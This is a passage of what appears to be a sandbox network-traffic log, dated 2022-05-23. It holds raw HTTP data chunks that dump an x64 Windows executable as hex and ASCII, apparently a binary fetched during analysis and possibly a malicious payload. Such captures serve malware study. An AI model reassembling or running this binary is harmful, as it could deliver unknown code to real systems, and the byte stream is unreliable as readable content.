                                                                            Data Ascii: ^[@SH HHC0H [EXSUVWATAUH8HAHH.A uHQLi@EeIUD+a8HI8E;EBH+LEAt&tt"tPtxxXxH_8HA+HHO03w(H+HDPpD+It'HO0DG(L
                                                                            2022-05-23 16:59:08 UTC192INData Raw: 20 4c 8d 05 48 e8 02 00 48 c7 03 00 00 00 00 e8 b8 fd ff ff 85 c0 78 2f 48 8b 4c 24 20 48 85 c9 75 07 b8 03 40 00 80 eb 1e 48 8b 01 4c 8b cb 4c 8b c7 48 8b d6 ff 50 18 48 8b 4c 24 20 48 8b 11 8b d8 ff 52 10 8b c3 48 83 c4 30 5f 5e 5b c3 cc 40 53 55 56 57 48 81 ec 38 03 00 00 48 c7 44 24 50 fe ff ff ff 48 8b 05 6c e8 03 00 48 33 c4 48 89 84 24 20 03 00 00 41 8b e9 49 8b f0 48 8b da 48 8b f9 48 c7 44 24 38 00 00 00 00 66 41 c7 00 00 00 48 85 c9 75 07 33 c0 e9 80 01 00 00 c7 44 24 20 00 08 00 00 41 b9 b8 02 00 00 4c 8d 44 24 60 33 d2 48 8b cb ff 15 1c 3a 02 00 48 85 c0 0f 84 57 01 00 00 0f ba 64 24 6c 10 0f 83 4b 01 00 00 48 8d 44 24 38 48 89 44 24 20 4c 8d 0d de b7 02 00 45 33 c0 48 8d 15 c4 b7 02 00 48 8d 4c 24 30 e8 de fe ff ff 85 c0 0f 88 1a 01 00 00 48
                                                                            Data Ascii: LHHx/HL$ Hu@HLLHPHL$ HRH0_^[@SUVWH8HD$PHlH3H$ AIHHHD$8fAHu3D$ ALD$`3H:HWd$lKHD$8HD$ LE3HHL$0H
                                                                            2022-05-23 16:59:08 UTC200INData Raw: 4c 69 fd ff cc 49 8b 03 49 8b cb ff 50 18 48 83 c0 18 48 89 03 c7 44 24 68 01 00 00 00 4c 8b 0e 41 8b 41 f0 48 8b 17 89 44 24 20 44 8b 42 f0 48 8b cb e8 cd 45 ff ff 48 8b c3 48 83 c4 40 5f 5e 5b c3 cc cc cc cc cc cc 40 55 48 83 ec 20 48 8b ea 8b 45 68 83 e0 01 85 c0 74 0d 83 65 68 fe 48 8b 4d 60 e8 4c 2f ff ff 48 83 c4 20 5d c3 cc cc 40 53 56 57 48 83 ec 20 85 d2 48 63 fa 48 8b f1 78 59 3b 79 08 7d 54 48 8b 41 10 48 8d 0c f8 e8 38 6c fd ff 8b 46 08 83 e8 01 3b f8 7d 26 48 8b 4e 10 8d 5f 01 48 63 c3 48 8d 14 c1 48 63 c7 48 8d 0c c1 e8 14 78 fe ff 8b 46 08 8b fb 83 e8 01 3b d8 7c da 48 8b 46 10 48 63 cf 48 8d 0c c8 48 83 c4 20 5f 5e 5b e9 f1 6b fd ff e8 7c 38 fe ff cc cc cc cc 40 53 55 56 57 41 54 41 55 41 56 48 83 ec 40 48 c7 44 24 30 fe ff ff ff 48 8b d9
                                                                            Data Ascii: LiIIPHHD$hLAAHD$ DBHEHH@_^[@UH HEhtehHM`L/H ]@SVWH HcHxY;y}THAH8lF;}&HN_HcHHcHxF;|HFHcHH _^[k|8@SUVWATAUAVH@HD$0H
                                                                            2022-05-23 16:59:08 UTC208INData Raw: 20 48 8d 4c 24 40 e8 c1 58 fe ff 45 33 c0 48 8b 54 24 40 48 8b 4c 24 20 e8 bf f0 ff ff 85 c0 0f 85 f6 00 00 00 48 8b 54 24 40 48 83 c2 e8 41 8b c5 f0 0f c1 42 10 41 03 c5 85 c0 7f 0a 48 8b 0a 48 8b 01 ff 50 08 90 48 8b 54 24 20 48 83 c2 e8 41 8b c5 f0 0f c1 42 10 41 03 c5 85 c0 7f 0a 48 8b 0a 48 8b 01 ff 50 08 90 48 8b 54 24 28 48 83 c2 e8 41 8b c5 f0 0f c1 42 10 41 03 c5 85 c0 7f 0a 48 8b 0a 48 8b 01 ff 50 08 90 48 8b 54 24 50 48 83 c2 e8 41 8b c5 f0 0f c1 42 10 41 03 c5 85 c0 7f 0a 48 8b 0a 48 8b 01 ff 50 08 90 48 8b 54 24 38 48 83 c2 e8 41 8b c5 f0 0f c1 42 10 41 03 c5 85 c0 7f 0a 48 8b 0a 48 8b 01 ff 50 08 90 48 8b 54 24 48 48 83 c2 e8 41 8b c5 f0 0f c1 42 10 41 03 c5 85 c0 7f 0a 48 8b 0a 48 8b 01 ff 50 08 90 48 8b 54 24 30 48 83 c2 e8 41 8b c5 f0 0f
                                                                            Data Ascii: HL$@XE3HT$@HL$ HT$@HABAHHPHT$ HABAHHPHT$(HABAHHPHT$PHABAHHPHT$8HABAHHPHT$HHABAHHPHT$0HA
                                                                            2022-05-23 16:59:08 UTC216INData Raw: 48 8b 00 49 8b cb ff 50 18 48 8d 78 18 48 89 7c 24 48 8b cb e8 df 23 ff ff 48 85 c0 74 15 44 8b c3 48 8b d0 48 8d 4c 24 48 e8 8e 2f fd ff 48 8b 7c 24 48 48 8d 4c 24 70 e8 d7 12 00 00 44 09 68 60 e8 02 25 ff ff 4c 8b d8 33 c9 48 85 c0 0f 95 c1 85 c9 75 0b b9 05 40 00 80 e8 f1 28 fd ff cc 48 8b 00 49 8b cb ff 50 18 48 83 c0 18 48 89 44 24 40 e8 d1 24 ff ff 4c 8b d8 33 c9 48 85 c0 0f 95 c1 85 c9 75 0b b9 05 40 00 80 e8 c0 28 fd ff cc 48 8b 00 49 8b cb ff 50 18 48 83 c0 18 48 89 44 24 50 48 85 f6 74 21 48 8d 4c 24 70 e8 62 12 00 00 48 8b d0 4c 8d 4c 24 50 4c 8b c6 48 8d 4c 24 40 e8 a9 fb ff ff eb 57 48 8b 6d 10 b8 01 00 00 00 48 85 ed 74 49 48 8b f5 48 85 ed 74 3b 48 8b 6d 00 48 8b 76 10 f7 d8 48 1b db 48 8d 44 24 50 48 23 d8 48 8d 4c 24 70 e8 16 12 00 00 48
                                                                            Data Ascii: HIPHxH|$H#HtDHHL$H/H|$HHL$pDh`%L3Hu@(HIPHHD$@$L3Hu@(HIPHHD$PHt!HL$pbHLL$PLHL$@WHmHtIHHt;HmHvHHD$PH#HL$pH
                                                                            2022-05-23 16:59:08 UTC224INData Raw: e9 0f 01 00 00 3b 3d 29 c1 03 00 ba 11 01 00 00 0f 84 e2 00 00 00 3b fa 75 0c 66 41 81 fc 0e 04 0f 84 d2 00 00 00 81 ff 00 c0 00 00 0f 82 ed fe ff ff 48 8b cb e8 22 8c fd ff 48 85 c0 48 8b d8 0f 84 d9 fe ff ff 48 8d 15 f3 45 02 00 48 8b c8 e8 73 0c ff ff 85 c0 74 13 48 8b cb e8 b3 f2 ff ff 0f ba 60 60 13 0f 82 b3 fe ff ff 3b 3d b6 c0 03 00 75 14 48 8b 03 48 8b d5 48 8b cb ff 90 b8 02 00 00 e9 76 ff ff ff 3b 3d 9e c0 03 00 75 22 48 8b 03 48 8b cb 48 89 ab 88 03 00 00 ff 90 c0 02 00 00 48 c7 83 88 03 00 00 00 00 00 00 48 98 eb 62 3b 3d 6c c0 03 00 75 24 4c 8b 13 48 8b c5 44 0f b7 c5 48 c1 e8 10 41 8b d4 48 8b cb 44 0f b7 c8 41 ff 92 c8 02 00 00 e9 41 fe ff ff 3b 3d 4c c0 03 00 0f 85 35 fe ff ff 48 8b 03 48 8b cb ff 90 b8 02 00 00 eb b6 45 33 c9 41 b8 46 e1
                                                                            Data Ascii: ;=);ufAH"HHHEHstH``;=uHHHv;=u"HHHHHb;=lu$LHDHAHDAA;=L5HHE3AF
                                                                            2022-05-23 16:59:08 UTC232INData Raw: 90 66 66 66 90 66 66 90 66 90 48 81 fa 00 10 00 00 72 b5 b8 20 00 00 00 0f 18 04 0a 0f 18 44 0a 40 48 81 c1 80 00 00 00 ff c8 75 ec 48 81 e9 00 10 00 00 b8 40 00 00 00 4c 8b 0c 0a 4c 8b 54 0a 08 4c 0f c3 09 4c 0f c3 51 08 4c 8b 4c 0a 10 4c 8b 54 0a 18 4c 0f c3 49 10 4c 0f c3 51 18 4c 8b 4c 0a 20 4c 8b 54 0a 28 48 83 c1 40 4c 0f c3 49 e0 4c 0f c3 51 e8 4c 8b 4c 0a f0 4c 8b 54 0a f8 ff c8 4c 0f c3 49 f0 4c 0f c3 51 f8 75 aa 49 81 e8 00 10 00 00 49 81 f8 00 10 00 00 0f 83 71 ff ff ff f0 80 0c 24 00 e9 b9 fe ff ff 66 66 66 90 66 66 66 90 66 66 66 90 66 66 66 90 66 66 66 90 66 90 49 03 c8 49 83 f8 08 72 61 f6 c1 07 74 36 f6 c1 01 74 0b 48 ff c9 8a 04 0a 49 ff c8 88 01 f6 c1 02 74 0f 48 83 e9 02 66 8b 04 0a 49 83 e8 02 66 89 01 f6 c1 04 74 0d 48 83 e9 04 8b 04
                                                                            Data Ascii: ffffffHr D@HuH@LLTLLQLLLTLILQLL LT(H@LILQLLLTLILQuIIq$ffffffffffffffffIIrat6tHItHfIftH
                                                                            2022-05-23 16:59:08 UTC236INData Raw: 0f af c8 49 8b d1 48 83 c4 38 e9 99 fe ff ff cc cc cc cc cc cc cc cc cc 44 89 44 24 18 48 89 4c 24 08 48 83 ec 68 48 89 5c 24 60 48 89 74 24 58 48 89 7c 24 50 4c 89 64 24 48 49 8b f1 41 8b f8 4c 8b e2 48 8b d9 66 90 83 ef 01 89 bc 24 80 00 00 00 78 0f 49 2b dc 48 89 5c 24 70 48 8b cb ff d6 eb e5 eb 00 48 8b 5c 24 60 48 8b 74 24 58 48 8b 7c 24 50 4c 8b 64 24 48 48 83 c4 68 c3 cc cc cc cc cc cc cc cc cc cc 40 55 48 83 ec 20 48 8b ea 48 89 4d 38 48 89 4d 28 48 8b 45 28 48 8b 08 48 89 4d 30 48 8b 45 30 81 38 63 73 6d e0 74 0c c7 45 20 00 00 00 00 8b 45 20 eb 05 e8 57 48 00 00 48 83 c4 20 5d c3 cc 4c 89 4c 24 20 44 89 44 24 18 48 89 54 24 10 48 83 ec 58 48 89 5c 24 50 48 89 74 24 48 48 89 7c 24 40 4c 89 64 24 38 4d 8b e1 49 63 f8 48 8b f2 c7 44 24 20 00 00 00
                                                                            Data Ascii: IH8DD$HL$HhH\$`Ht$XH|$PLd$HIALHf$xI+H\$pHH\$`Ht$XH|$PLd$HHh@UH HHM8HM(HE(HHM0HE08csmtE E WHH ]LL$ DD$HT$HXH\$PHt$HH|$@Ld$8MIcHD$
                                                                            2022-05-23 16:59:08 UTC244INData Raw: 0d 8d 42 ff 4c 8b 64 24 30 48 83 c4 38 c3 0f b6 02 48 89 7c 24 58 84 c0 74 22 3c 3d 74 04 41 83 c0 01 33 c0 48 8b fa 48 c7 c1 ff ff ff ff f2 ae 48 f7 d1 48 03 d1 8a 02 84 c0 75 de 41 8d 40 01 ba 08 00 00 00 48 89 74 24 50 48 63 c8 e8 26 f9 ff ff 48 85 c0 48 8b f0 48 89 05 71 72 03 00 75 17 48 8b 7c 24 58 8d 46 ff 48 8b 74 24 50 4c 8b 64 24 30 48 83 c4 38 c3 48 89 5c 24 40 48 8b 1d 04 72 03 00 48 89 6c 24 48 0f b6 13 84 d2 74 71 66 66 66 90 66 66 66 90 33 c0 48 c7 c1 ff ff ff ff 48 8b fb f2 ae 80 fa 3d 48 f7 d1 48 63 f9 74 40 48 63 e9 8d 50 01 48 8b cd e8 b9 f8 ff ff 48 85 c0 48 89 06 74 76 4c 8b c3 48 8b d5 48 8b c8 e8 a3 94 00 00 85 c0 74 14 45 33 c9 45 33 c0 33 d2 33 c9 4c 89 64 24 20 e8 5b eb ff ff 48 83 c6 08 48 03 df 8a 13 84 d2 75 9e 48 8b 1d 87 71
                                                                            Data Ascii: BLd$0H8H|$Xt"<=tA3HHHHuA@Ht$PHc&HHHqruH|$XFHt$PLd$0H8H\$@HrHl$Htqffffff3HH=HHct@HcPHHHtvLHHtE3E333Ld$ [HHuHq
                                                                            2022-05-23 16:59:08 UTC252INData Raw: 00 00 00 48 81 c4 a8 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 8b c4 48 81 ec a8 05 00 00 48 89 58 f8 48 89 68 f0 48 8b ac 24 d0 05 00 00 48 89 78 e0 4c 89 60 d8 4c 89 68 d0 4c 89 70 c8 4c 89 78 c0 4c 8b ea 4c 8b f1 45 32 ff 49 8b d1 48 8b cd 4d 8b e1 49 8b d8 44 88 bc 24 b0 05 00 00 e8 f1 ed ff ff 4c 8d 4c 24 68 4c 8b c5 49 8b d4 49 8b cd 8b f8 89 44 24 58 e8 98 9d ff ff 4c 8b c5 49 8b d4 49 8b cd e8 7a ef ff ff 3b f8 7e 26 48 8d 4c 24 68 44 8b cf 4c 8b c5 49 8b d4 e8 03 ef ff ff 44 8b cf 4c 8b c5 49 8b d4 49 8b cd e8 02 ef ff ff eb 14 4c 8b c5 49 8b d4 49 8b cd e8 42 ef ff ff 8b f8 89 44 24 58 83 ff ff 7c 05 3b 7d 04 7c 05 e8 5d 08 00 00 41 81 3e 63 73 6d e0 0f 85 5b 01 00 00 41 83 7e 18 04 0f 85
                                                                            Data Ascii: HLL$ LD$HT$HHHXHhH$HxL`LhLpLxLLE2IHMID$LL$hLIID$XLIIz;~&HL$hDLIDLIILIIBD$X|;}|]A>csm[A~
                                                                            2022-05-23 16:59:08 UTC260INData Raw: 00 c1 e8 04 83 f8 08 89 44 24 40 0f 84 81 0b 00 00 83 f8 07 0f 87 61 0b 00 00 8b 8c 82 f0 26 04 00 48 03 ca ff e1 41 be ff ff ff ff 44 89 84 24 a4 00 00 00 44 89 44 24 70 45 8b d8 44 89 44 24 54 45 8b d0 44 89 74 24 4c 44 89 44 24 50 41 8b f0 44 89 44 24 44 44 89 44 24 60 e9 1b 0b 00 00 41 0f b7 c4 83 f8 20 74 59 83 f8 23 74 43 83 f8 2b 74 2e 83 f8 2d 74 19 83 f8 30 0f 85 f6 0a 00 00 8b 44 24 40 83 ce 08 89 74 24 44 e9 ea 0a 00 00 8b 44 24 40 83 ce 04 89 74 24 44 e9 da 0a 00 00 8b 44 24 40 83 ce 01 89 74 24 44 e9 ca 0a 00 00 8b 44 24 40 0f ba ee 07 89 74 24 44 e9 b9 0a 00 00 8b 44 24 40 83 ce 02 89 74 24 44 e9 a9 0a 00 00 66 41 83 fc 2a 75 2e 44 8b 1f 48 83 c7 08 45 85 db 48 89 7c 24 58 44 89 5c 24 54 0f 89 88 0a 00 00 83 ce 04 41 f7 db 44 89 5c 24 54 89
                                                                            Data Ascii: D$@a&HAD$DD$pEDD$TEDt$LDD$PADD$DDD$`A tY#tC+t.-t0D$@t$DD$@t$DD$@t$DD$@t$DD$@t$DfA*u.DHEH|$XD\$TAD\$T
                                                                            2022-05-23 16:59:08 UTC264INData Raw: 98 48 8d 0d 18 d4 fb ff 0f b6 84 01 34 2e 04 00 8b 94 81 1c 2e 04 00 48 03 d1 ff e2 4c 8d 25 ed 2d 03 00 48 8b 0d e6 2d 03 00 bf 01 00 00 00 89 7c 24 30 eb 49 4c 8d 25 dc 2d 03 00 48 8b 0d d5 2d 03 00 bf 01 00 00 00 89 7c 24 30 eb 30 4c 8d 25 cb 2d 03 00 48 8b 0d c4 2d 03 00 bf 01 00 00 00 89 7c 24 30 eb 17 4c 8d 25 ba 2d 03 00 48 8b 0d b3 2d 03 00 bf 01 00 00 00 89 7c 24 30 e8 8d a1 ff ff 4c 8b e8 eb 5f e8 53 a3 ff ff 48 8b f0 48 85 c0 75 08 8d 46 ff e9 75 01 00 00 48 8b 90 a0 00 00 00 48 8b ca 4c 63 05 ee ca 02 00 66 90 39 59 04 74 13 48 83 c1 10 49 8b c0 48 c1 e0 04 48 03 c2 48 3b c8 72 e8 49 8b c0 48 c1 e0 04 48 03 c2 48 3b c8 73 05 39 59 04 74 03 49 8b ce 4c 8d 61 08 4d 8b 2c 24 49 83 fd 01 75 07 33 c0 e9 1e 01 00 00 4d 85 ed 75 0a 41 8d 4d 03 e8 be
                                                                            Data Ascii: H4..HL%-H-|$0IL%-H-|$00L%-H-|$0L%-H-|$0L_SHHuFuHHLcf9YtHIHHH;rIHHH;s9YtILaM,$Iu3MuAM
                                                                            2022-05-23 16:59:08 UTC272INData Raw: 03 d8 48 8d 05 ff b0 02 00 85 db 4c 0f 44 c8 41 39 51 04 8b c2 49 8d 49 04 7d 11 66 90 66 66 90 48 83 c1 04 41 83 c2 01 39 11 7c f4 48 8b 5c 24 40 41 83 ea 01 49 63 ca 45 89 50 10 41 2b 04 89 41 89 40 0c 48 8b c6 48 8b 74 24 50 48 f7 2f 48 8b 7c 24 58 48 8b ca 48 c1 f9 0d 41 89 68 20 48 8b 6c 24 48 48 8b c1 48 c1 e8 3f 48 03 c8 b8 93 24 49 92 83 c1 04 f7 e9 03 d1 c1 fa 02 8b c2 c1 e8 1f 03 d0 48 b8 05 7c f3 6a e2 59 d1 48 6b d2 07 2b ca 49 f7 eb 41 89 48 18 48 c1 fa 0a 48 8b c2 48 c1 e8 3f 48 03 d0 48 63 c2 41 89 50 08 48 69 c0 f0 f1 ff ff 4c 03 d8 48 b8 89 88 88 88 88 88 88 88 49 f7 eb 49 03 d3 48 c1 fa 05 48 8b c2 48 c1 e8 3f 48 03 d0 41 89 50 04 6b d2 3c 44 2b da 33 c0 45 89 18 48 83 c4 38 c3 cc cc cc cc cc 48 83 ec 38 48 85 c9 75 2d e8 62 62 ff ff 45
                                                                            Data Ascii: HLDA9QII}fffHA9|H\$@AIcEPA+A@HHt$PH/H|$XHHAh Hl$HHH?H$IH|jYHk+IAHHHH?HHcAPHiLHIIHHH?HAPk<D+3EH8H8Hu-bbE
                                                                            2022-05-23 16:59:08 UTC280INData Raw: 4c 8b 7c 24 58 4c 8b 74 24 60 4c 8b 6c 24 68 4c 8b 64 24 70 48 8b 7c 24 78 48 8b b4 24 80 00 00 00 48 8b ac 24 88 00 00 00 48 8b 9c 24 90 00 00 00 48 81 c4 98 00 00 00 c3 cc cc cc cc cc cc cc 4c 8b dc 48 81 ec 98 00 00 00 48 8b 05 97 88 02 00 48 33 c4 48 89 44 24 60 48 8b 09 49 89 5b f8 49 89 6b f0 48 8b ac 24 c0 00 00 00 49 89 73 e8 49 89 7b e0 48 8b fa 49 8b d8 41 8b f1 49 8d 53 98 4d 8d 43 b0 41 b9 16 00 00 00 e8 70 4b 00 00 48 85 ff 75 26 e8 c6 42 ff ff 33 c9 45 33 c9 45 33 c0 33 d2 c7 00 16 00 00 00 48 89 4c 24 20 e8 fc 5a ff ff b8 16 00 00 00 eb 69 48 85 db 74 d5 44 8b 4c 24 30 33 c9 48 83 fb ff 75 05 48 8b d3 eb 10 41 83 f9 2d 48 8b c1 48 8b d3 0f 94 c0 48 2b d0 44 8b 44 24 34 44 03 c6 41 83 f9 2d 4c 8d 4c 24 30 0f 94 c1 48 03 cf e8 e2 49 00 00 85
                                                                            Data Ascii: L|$XLt$`Ll$hLd$pH|$xH$H$H$HLHHH3HD$`HI[IkH$IsI{HIAISMCApKHu&B3E3E33HL$ ZiHtDL$03HuHA-HHH+DD$4DA-LL$0HI
                                                                            2022-05-23 16:59:08 UTC288INData Raw: 33 d2 33 c9 c7 00 16 00 00 00 48 89 5c 24 20 e8 9c 3b ff ff e9 4c 06 00 00 41 f6 44 0d 08 20 74 0d 33 d2 8b cb 44 8d 42 02 e8 a2 fc ff ff 8b cb e8 6b 08 00 00 85 c0 0f 84 a3 02 00 00 48 8d 15 7c e6 02 00 4a 8b 04 fa 41 f6 44 05 08 80 0f 84 a5 02 00 00 e8 27 44 ff ff 33 db 48 8d 54 24 48 48 8b 88 c0 00 00 00 48 8d 05 52 e6 02 00 39 59 14 4a 8b 0c f8 49 8b 4c 0d 00 0f 94 c3 ff 15 cd b6 00 00 85 c0 0f 84 67 02 00 00 85 db 74 09 40 84 ff 0f 84 51 02 00 00 ff 15 aa b6 00 00 85 ed 89 74 24 4c 44 8b e8 89 44 24 48 49 8b dc 0f 84 22 02 00 00 44 8b 7c 24 48 66 66 90 66 66 66 90 40 84 ff 0f 85 57 01 00 00 0f be 0b 45 33 ff 80 f9 0a 41 0f 94 c7 e8 45 0e 00 00 85 c0 75 20 44 8d 40 01 48 8d 4c 24 40 48 8b d3 e8 80 11 00 00 83 f8 ff 75 35 44 8b 7c 24 48 e9 e8 04 00 00
                                                                            Data Ascii: 33H\$ ;LAD t3DBkH|JAD'D3HT$HHHR9YJILgt@Qt$LDD$HI"D|$Hfffff@WE3AEu D@HL$@Hu5D|$H
                                                                            2022-05-23 16:59:08 UTC296INData Raw: 48 83 bc 24 80 00 00 00 ff 74 2e 48 3b f8 40 88 33 77 26 e8 48 03 ff ff 45 33 c9 45 33 c0 33 d2 33 c9 48 89 74 24 20 c7 00 22 00 00 00 e8 7e 1b ff ff b8 22 00 00 00 eb 18 48 8b c7 be 50 00 00 00 c6 44 18 ff 00 48 85 ed 74 04 48 89 45 00 8b c6 48 8b 7c 24 38 48 8b 74 24 40 48 8b 6c 24 48 48 8b 5c 24 50 48 83 c4 58 c3 cc cc cc cc cc cc 48 83 ec 38 48 8b 44 24 60 48 c7 44 24 28 00 00 00 00 48 89 44 24 20 e8 c4 fe ff ff 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 66 44 89 4c 24 20 48 8b c4 48 81 ec 98 00 00 00 48 85 d2 48 89 70 e8 48 89 78 e0 4c 89 60 d8 4c 89 68 d0 49 8b f0 4c 8b ea 48 8b f9 75 17 4d 85 c0 74 12 48 85 c9 74 06 45 33 e4 44 89 21 33 c0 e9 63 02 00 00 48 85 c9 74 06 c7 01 ff ff ff ff 49 81 f8 ff ff ff 7f 76 2c e8 62 02 ff ff 45
                                                                            Data Ascii: H$t.H;@3w&HE3E333Ht$ "~"HPDHtHEH|$8Ht$@Hl$HH\$PHXH8HD$`HD$(HD$ H8fDL$ HHHHpHxL`LhILHuMtHtE3D!3cHtIv,bE
                                                                            2022-05-23 16:59:08 UTC304INData Raw: 66 b8 ff ff 48 8b 4c 24 50 48 33 cc e8 2f c1 fe ff 48 83 c4 60 5b c3 cc cc cc cc cc cc cc cc cc 48 83 ec 38 48 89 5c 24 40 48 89 74 24 48 48 89 7c 24 50 4c 89 64 24 58 45 33 e4 41 8b fc 41 8d 4c 24 01 e8 a8 5e ff ff 90 bb 03 00 00 00 89 5c 24 20 3b 1d 48 a6 02 00 7d 6a 48 63 f3 48 8b 05 24 96 02 00 48 83 3c f0 00 74 50 48 8b 0c f0 f6 41 18 83 74 11 e8 26 41 00 00 83 f8 ff 74 07 83 c7 01 89 7c 24 24 83 fb 14 7c 30 48 8b 05 f6 95 02 00 48 8b 0c f0 48 83 c1 30 ff 15 28 78 00 00 48 8b 0d e1 95 02 00 48 8b 0c f1 e8 90 c9 fe ff 4c 8b 1d d1 95 02 00 4d 89 24 f3 83 c3 01 89 5c 24 20 eb 8e b9 01 00 00 00 e8 f2 5c ff ff 8b c7 48 8b 5c 24 40 48 8b 74 24 48 48 8b 7c 24 50 4c 8b 64 24 58 48 83 c4 38 c3 cc cc cc cc cc cc cc 40 55 48 83 ec 20 48 8b ea b9 01 00 00 00 e8
                                                                            Data Ascii: fHL$PH3/H`[H8H\$@Ht$HH|$PLd$XE3AAL$^\$ ;H}jHcH$H<tPHAt&At|$$|0HHH0(xHHLM$\$ \H\$@Ht$HH|$PLd$XH8@UH H
                                                                            2022-05-23 16:59:08 UTC312INData Raw: 8b 7c 24 78 48 81 c4 88 00 00 00 c3 cc cc cc cc 4c 8b dc 48 81 ec f8 00 00 00 48 8b 05 c7 08 02 00 48 33 c4 48 89 84 24 a0 00 00 00 49 89 5b f8 49 89 6b f0 49 89 73 e8 48 8b b4 24 38 01 00 00 49 89 7b e0 33 ff 48 85 f6 4d 89 63 d8 4d 89 6b d0 4d 89 73 c8 4d 89 7b c0 44 89 4c 24 38 4c 8b ea 48 89 4c 24 48 4d 8d 5b 88 66 c7 44 24 34 00 00 44 8d 77 01 44 8b d7 8b ef 44 8b ff 44 8b e7 8b c7 89 7c 24 30 8b df 44 8b cf 75 26 e8 ce c2 fe ff 45 33 c9 45 33 c0 33 d2 33 c9 48 89 7c 24 20 c7 00 16 00 00 00 e8 04 db fe ff 33 c0 e9 a0 0a 00 00 49 8b f8 41 0f b6 00 3c 20 74 0c 3c 09 74 08 3c 0a 74 04 3c 0d 75 05 4d 03 c6 eb e7 48 8d 0d 4a 13 fb ff 66 66 66 90 66 66 90 66 66 90 41 0f b6 10 49 83 c0 01 41 83 f9 0b 0f 87 41 04 00 00 49 63 c1 8b 8c 81 8c f7 04 00 48 8d 05
                                                                            Data Ascii: |$xHLHHH3H$I[IkIsH$8I{3HMcMkMsM{DL$8LHL$HM[fD$4DwDDD|$0Du&E3E333H|$ 3IA< t<t<t<uMHJfffffffAIAAIcH
                                                                            2022-05-23 16:59:08 UTC320INData Raw: 0e 48 8d 54 24 30 8b d8 48 83 c5 01 e8 df a4 ff ff 48 83 c6 01 48 83 ef 01 74 08 85 db 74 04 3b d8 74 cd 2b d8 80 7c 24 48 00 74 0c 48 8b 4c 24 40 83 a1 c8 00 00 00 fd 8b c3 48 8b 5c 24 60 48 8b 7c 24 78 48 8b 74 24 70 48 8b 6c 24 68 48 83 c4 58 c3 33 c0 48 8b 7c 24 78 48 8b 74 24 70 48 8b 6c 24 68 48 83 c4 58 c3 cc cc cc cc cc cc cc 48 83 ec 48 33 c0 48 8d 0d bb e7 00 00 45 33 c9 48 89 44 24 30 89 44 24 28 44 8d 40 03 ba 00 00 00 40 c7 44 24 20 03 00 00 00 ff 15 00 37 00 00 48 89 05 89 fd 01 00 48 83 c4 48 c3 cc cc cc cc 48 83 ec 28 48 8b 0d 75 fd 01 00 48 83 f9 ff 74 0c 48 83 f9 fe 74 06 ff 15 9b 38 00 00 48 8b 0d 54 fd 01 00 48 83 f9 ff 74 0c 48 83 f9 fe 74 06 ff 15 82 38 00 00 48 83 c4 28 c3 cc cc cc cc cc 48 83 ec 38 48 85 c9 48 89 5c 24 50 48 89 74
                                                                            Data Ascii: HT$0HHHtt;t+|$HtHL$@H\$`H|$xHt$pHl$hHX3H|$xHt$pHl$hHXHH3HE3HD$0D$(D@@D$ 7HHHH(HuHtHt8HTHtHt8H(H8HH\$PHt
                                                                            2022-05-23 16:59:08 UTC328INData Raw: 24 48 33 c0 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 58 48 89 5c 24 60 48 89 6c 24 68 48 89 74 24 70 40 32 f6 4d 85 c0 48 89 7c 24 78 4c 89 64 24 50 40 88 74 24 48 44 8b e2 48 8b d9 75 6a e8 3b a4 fe ff 48 8b f8 4c 8b 80 c0 00 00 00 48 8b a8 b8 00 00 00 4c 3b 05 93 d7 01 00 74 13 8b 90 c8 00 00 00 85 15 0d d6 01 00 75 05 e8 8e 52 ff ff 48 3b 2d f7 d4 01 00 74 16 8b 87 c8 00 00 00 85 05 f1 d5 01 00 75 08 e8 92 46 ff ff 48 8b e8 8b 8f c8 00 00 00 f6 c1 02 75 30 83 c9 02 40 b6 01 89 8f c8 00 00 00 eb 22 49 8b 00 48 8d 4c 24 30 48 89 01 49 8b 40 08 48 89 41 08 0f b6 74 24 48 48 8b 7c 24 40 48 8b 6c 24 38 48 85 db 75 27 e8 8a 82 fe ff 45 33 c9 45 33 c0 33 d2 33 c9 48 89 5c 24 20 c7 00 16 00 00 00 e8 c0 9a fe ff 40 84 f6 e9 85 00 00
                                                                            Data Ascii: $H3H8HXH\$`Hl$hHt$p@2MH|$xLd$P@t$HDHuj;HLHL;tuRH;-tuFHu0@"IHL$0HI@HAt$HH|$@Hl$8Hu'E3E333H\$ @
                                                                            2022-05-23 16:59:08 UTC336INData Raw: 00 00 00 00 00 00 00 00 90 4f 05 10 00 00 00 00 90 e1 06 10 00 00 00 00 20 f4 05 10 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 f0 4f 05 10 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 20 50 05 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 50 05 10 00 00 00 00 06 0f 0f 0f 06 00 00 00 20 4f 05 10 00 00 00 00 40 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 78 b6 05 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 50 05 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 10 06 10 00 00 00 00 20 ab 00 10 00 00 00
                                                                            Data Ascii: O O P@P O@xP
                                                                            2022-05-23 16:59:08 UTC344INData Raw: 20 4e 06 00 20 00 00 00 00 00 00 00 01 00 00 00 22 05 93 19 01 00 00 00 54 4e 06 00 00 00 00 00 00 00 00 00 03 00 00 00 5c 4e 06 00 30 00 00 00 00 00 00 00 01 00 00 00 48 74 6d 6c 48 65 6c 70 57 00 00 00 00 00 00 00 68 68 63 74 72 6c 2e 6f 63 78 00 00 00 00 00 00 20 1d 06 10 00 00 00 00 a8 3a 01 10 00 00 00 00 cc 3a 01 10 00 00 00 00 c0 3a 01 10 00 00 00 00 78 85 01 10 00 00 00 00 f4 38 01 10 00 00 00 00 00 1d 06 10 00 00 00 00 b4 3a 01 10 00 00 00 00 e4 3a 01 10 00 00 00 00 d8 3a 01 10 00 00 00 00 64 30 01 10 00 00 00 00 00 00 00 00 00 00 00 00 f8 19 06 10 00 00 00 00 30 3a 01 10 00 00 00 00 fc 39 01 10 00 00 00 00 04 3a 01 10 00 00 